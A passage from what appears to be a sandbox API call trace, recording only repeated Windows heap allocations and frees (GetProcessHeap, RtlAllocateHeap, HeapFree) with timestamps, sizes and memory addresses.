(HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0x68220c0 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6826538 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x681cb68 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x681abc0 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xefb838 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0x6843670 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f980 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x681cff8 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xefb838 | out: hHeap=0xe30000) returned 1 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x6843b08 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x681cff8 | out: hHeap=0xe30000) returned 1 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9fa18 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.060] GetProcessHeap () returned 0xe30000 [0101.060] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.060] GetProcessHeap () returned 0xe30000 [0101.061] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825698 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825698 | out: hHeap=0xe30000) returned 1 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0x681cff8 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9fa18 | out: hHeap=0xe30000) returned 1 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x6843f98 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x681cff8 | out: hHeap=0xe30000) returned 1 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.061] GetProcessHeap () returned 0xe30000 [0101.061] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.062] GetProcessHeap () returned 0xe30000 [0101.062] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0101.062] GetProcessHeap () returned 0xe30000 [0101.063] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825698 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825698 | out: hHeap=0xe30000) returned 1 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.063] GetProcessHeap () returned 0xe30000 [0101.063] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.063] GetProcessHeap () returned 0xe30000 [0101.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.064] GetProcessHeap () returned 0xe30000 [0101.064] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0101.064] GetProcessHeap () returned 0xe30000 [0101.065] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825698 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825698 | out: hHeap=0xe30000) returned 1 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.065] GetProcessHeap () returned 0xe30000 [0101.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0101.065] GetProcessHeap () returned 0xe30000 [0101.066] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0101.066] GetProcessHeap () returned 0xe30000 [0101.066] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0101.066] GetProcessHeap () returned 0xe30000 [0101.067] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.067] GetProcessHeap () returned 0xe30000 [0101.067] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.067] GetProcessHeap () returned 0xe30000 [0101.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825698 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825698 | out: hHeap=0xe30000) returned 1 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0101.068] GetProcessHeap () returned 0xe30000 [0101.068] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0101.068] GetProcessHeap () returned 0xe30000 [0101.069] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.069] GetProcessHeap () returned 0xe30000 [0101.069] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.069] GetProcessHeap () returned 0xe30000 